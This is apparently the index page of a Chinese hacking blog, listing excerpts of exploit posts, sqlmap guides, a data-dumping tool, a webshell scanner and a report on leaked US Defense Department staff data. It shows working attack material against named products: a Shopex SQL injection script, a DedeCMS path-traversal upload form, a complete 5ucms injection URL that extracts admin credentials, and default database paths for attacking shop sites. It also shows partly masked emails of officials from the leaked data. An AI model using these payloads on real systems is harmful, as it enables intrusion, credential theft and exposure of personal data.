Shopex 4.8.5 SQL Injection Exp

<script language="javascript"> function expstart() { var url = document.forms[0].url.value; if(url != ""){ if(url.search("http://") < 0 && url.search("https://") < 0){ url = "http:...

- 阅读全文 -

织梦cms v6.7最新上传漏洞

EXp: <form action="http://127.0.0.1/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1">...

- 阅读全文 -

5ucms 最新版 sql 注入漏洞

漏洞EXP↓  /mobile/index.asp?act=view&id=1%20union%20select%201,Username%26chr(124)%26CheckCode%20from%20{pre}admin 放手上很久了,没怎么用。就放出来吧。希望只用于测试。不要恶意利用。

- 阅读全文 -

SQLMAP 注射工具用法

1 。  介绍 1.1 要求 1.2 网应用情节 1.3 SQL 射入技术 1.4 特点 1.5 下载和更新sqlmap 1.6 执照 2 。 用法 2.1 帮助 2.2 目标URL 2.3 目标URL 和verbosity 2.4 URL 参量 2.5 Google dork 2.6 HTTP 方法: 得到或张贴 2.7 张贴的数据串 2.8 HTTP 曲奇饼倒栽跳水 2.9 HTTP 用户代理...

- 阅读全文 -

SQLmap工具介绍及其使用

http://sqlmap.sourceforge.net/ 这是SEVEN大哥写的!: 从黑防上看到他们说是有什么内部的工具,国外的注入工具,python的。想下载看看,结果是vip工具。 就从百度上搜索,没有发现。看来在国内还没有流行。就直接去google上搜索去了。 结果发现了这个工具。 功能非常强大。 我以前的想法,这个工具全都实现了。而且功能更强。新一代的强大工具。我还没有时间来得及分析...

- 阅读全文 -

WindowsXP上安装和运行神器SqlMap的步骤

本文要介绍的是如何在Windows XP上安装和运行SqlMap的安装步骤。 在Windows XP上安装和运行SqlMap的步骤…… 1、首先下载SqlMap 点击下载。 2、其次下载用于Windows系统的Python ……点击这里…… 3、然后安装Python: Python默认安装的路径是“C:\Python”(你也可以修改安装路径,但要记住路径),直接默认安装“下一步”OK … :) 4...

- 阅读全文 -

美国国防部数据被Anonymous泄露

       美国国防部数据被Anonymous泄露一个匿名的黑客组织“Wikiboat”攻击了美国国防部的网站,他们把从网站上获得的数据发布到了pastebin(点击查看)。此外他们今天还攻击了http://game.de 并使其被迫下线(目前已恢复)。被泄露的国防部数据包括部分官员的名字、email、ID和电话号码等信息 Kenn***osniak@us.army.mil Rich*...

- 阅读全文 -

K8-MSSQL综合利用工具V1.1 可秒脱百万/千万记录数据

  程序:K8-MSSQL综合利用工具V1.0 语言:VS2010 C# (.NET Framework v2.0) 作者:拉登哥哥 QQ:396890445 更新历史: 2012-06-09 [+] BCP导出txt(可导出整个表) 秒脱百万/千万记录 测试导出CSDN 640W数据 仅需10-15秒 [+] 导出htm格式(可导出指定列) 只适合100W以下记录 [+] 修复空格(数...

- 阅读全文 -

自己写的php木马webshell扫描器

因为前端时间服务器被放过 所以写了个webshell扫描器 呵呵 专杀php webshell 不管大马还是小马 包括一句话 现在放出代码来   <?php /* +--------------------------------------------------------------------------+ | Codz by indexphp Version:0.01 | | (c...

- 阅读全文 -

在线订单站的一些渗透思路和后门

作者:黑面 上现在出现了很多单页面单产品的在线网购站,很多童鞋看了认为很难下手,完全没有思路,其实有的站还是很简单的,我大概总结下我碰到的一些漏洞和后门。 ASP的站基本都是用套叫企业通用管理系统XP版的程序做的。 1.默认数据库 /data/data.asp /data/data.mdb 2.暴库 /inc/conn.asp /inc/lconn.asp /admin/conn.asp /adm...

- 阅读全文 -